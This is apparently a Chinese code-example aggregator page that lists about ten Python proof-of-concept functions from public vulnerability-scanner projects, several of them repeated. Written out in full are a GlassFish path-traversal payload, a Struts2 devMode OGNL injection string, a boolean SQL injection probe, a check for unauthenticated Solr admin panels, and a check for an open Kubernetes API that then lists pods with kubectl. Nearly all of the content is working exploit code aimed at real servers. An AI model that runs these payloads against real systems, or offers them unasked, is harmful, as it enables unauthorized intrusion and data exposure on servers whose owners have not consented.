Python firefox示例

示例#1

文件： solr-unauth.py 项目： 0x24bin/POC-T

def poc(target):
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            url = each
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
            url = url + '/solr/'
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
        except Exception:
            pass
    return False

示例#2

def poc(target):
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            url = each
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
            url = url + '/solr/'
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
        except Exception:
            pass
    return False

示例#3

文件： solr_unauth.py 项目： carry-pan/poc

def poc(url):
    portlist = [
        '21', '22', '23', '25', '53', '110', '137', '161', '389', '445', '873',
        '1090', '1099', '1433', '1521', '2049', '2181', '2222', '2375', '3306',
        '3389', '5432', '5901', '5984', '6379', '11211', '27017'
    ]
    if url.split(':')[1] in portlist:
        return False
    elif int(url.split(':')[1]) == 443:
        url = 'https://' + url.split(':')[0]
    elif int(url.split(':')[1]) == 8443:
        url = 'https://' + url
    else:
        url = 'http://' + url

    fileList = r"""
    /
    /solr/
    """
    paths = fileList.strip().splitlines()
    for path in paths:
        try:
            url = url + path.strip()
            requests.packages.urllib3.disable_warnings(
            )  #解决InsecureRequestWarning警告
            g = requests.get(url,
                             headers={'User-Agent': firefox()},
                             verify=False,
                             timeout=5)
            if g.status_code == 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return '[solr unauth]\t' + url
            else:
                continue
        except Exception:
            return False

示例#4

文件： glassfish-traversal.py 项目： 0x24bin/POC-T

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
    except Exception:
        return False
    if 'Version' in c:
        return True
    return False

示例#5

文件： 60998_glassfish-traversal.py 项目： 5l1v3r1/POC-S-1

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
    except Exception:
        return False
    if 'Version' in c:
        return True
    return False

示例#6

文件： struts2-devmode.py 项目： 0x24bin/POC-T

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        return False

示例#7

文件： struts2-devmode.py 项目： 5l1v3r1/POC-S-1

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        logging.debug(e)

示例#8

def poc(url):
    target = get_entry(url)
    if not target:
        return False

    if CHECK_WAF and has_waf(target):
        return '[Uncertain,WAF detected!] ' + get_domain(target)

    data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"

    # Content-Type needed
    headers = {'User-Agent': firefox(),
               'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        r1 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=1'))
        r2 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=2'))
    except:
        return False
    if r1.status_code == r2.status_code == 200 and len(r1.content) != len(r2.content):
        return True
    return False

示例#9

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '443' in url:
        url = url.replace('http:', 'https:')
    try:
        g = requests.get(url,
                         headers={'User-Agent': firefox()},
                         timeout=3,
                         verify=False)
        if g.status_code is 200 and 'healthz' in g.content and 'metrics' in g.content:
            pods = subprocess.Popen(
                "kubectl -s %s get pods --all-namespaces=true -o=wide" % url,
                stdout=subprocess.PIPE,
                stdin=subprocess.PIPE,
                stderr=open("/dev/null", "w"),
                shell=True)
            output = pods.communicate()[0].decode("utf-8")
            if "Please enter Username" not in output and "Error from server" not in output:
                return url
    except Exception:
        pass
    return False

示例#10

文件： struts2-devmode.py 项目： fate93930/poc-t-db

"""

import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception, e:
            return False
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        return False
    return False